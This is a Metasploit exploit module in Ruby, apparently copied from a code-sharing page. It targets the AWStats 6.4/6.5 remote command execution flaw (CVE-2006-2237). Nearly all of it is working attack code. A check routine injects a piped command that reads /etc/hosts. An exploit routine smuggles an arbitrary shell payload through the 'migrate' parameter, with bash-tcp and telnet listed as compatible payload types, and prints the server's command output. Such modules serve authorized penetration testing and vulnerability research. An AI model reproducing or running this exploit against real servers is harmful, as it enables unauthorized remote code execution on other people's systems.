Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'AWStats migrate Remote Command Execution',
14
      'Description'    => %q{
15
          This module exploits an arbitrary command execution vulnerability in the
16
        AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
17
        payloads are recommended with this module. The vulnerability is only
18
        present when AllowToUpdateStatsFromBrowser is enabled in the AWStats
19
        configuration file (non-default).
20
      },
21
      'Author'         => [ 'aushack' ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          ['CVE', '2006-2237'],
26
          ['OSVDB', '25284'],
27
          ['BID', '17844'],
28
          ['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
29
          ['EDB', '1755'],
30
        ],
31
      'Privileged'     => false,
32
      'Payload'        =>
33
        {
34
          'DisableNops' => true,
35
          'Space'       => 512,
36
          'Compat'      =>
37
            {
38
              'PayloadType' => 'cmd cmd_bash',
39
              'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
40
            }
41
        },
42
      'Platform'       => 'unix',
43
      'Arch'           => ARCH_CMD,
44
      'Targets'        => [[ 'Automatic', { }]],
45
      'DisclosureDate' => '2006-05-04',
46
      'DefaultTarget'  => 0))
47

48
    register_options(
49
      [
50
        OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
51
        OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
52
      ])
53
  end
54

55
  def check
56
    res = send_request_cgi({
57
      'uri'      => normalize_uri(datastore['URI']),
58
      'vars_get' =>
59
        {
60
          'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
61
        }
62
      }, 25)
63

64
    if (res and res.body.match(/localhost/))
65
      return Exploit::CheckCode::Vulnerable
66
    end
67

68
    return Exploit::CheckCode::Safe
69
  end
70

71
  def exploit
72
    command = Rex::Text.uri_encode("cd /tmp &&" + payload.encoded)
73
    sploit = normalize_uri(datastore['URI']) + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
74

75
    res = send_request_raw({
76
      'uri'     => sploit,
77
      'method'  => 'GET',
78
      'headers' =>
79
        {
80
          'Connection' => 'Close',
81
        }
82
      }, 25)
83

84
    if (res)
85
      print_status("The server returned: #{res.code} #{res.message}")
86

87
      m = res.body.match(/YYY\n(.*)\nYYY/m)
88

89
      if (m)
90
        print_status("Command output from the server:")
91
        print("\n" + m[1] + "\n\n")
92
      else
93
        print_status("This server may not be vulnerable")
94
      end
95
    else
96
      print_status("No response from the server")
97
    end
98
  end
99
end
100

101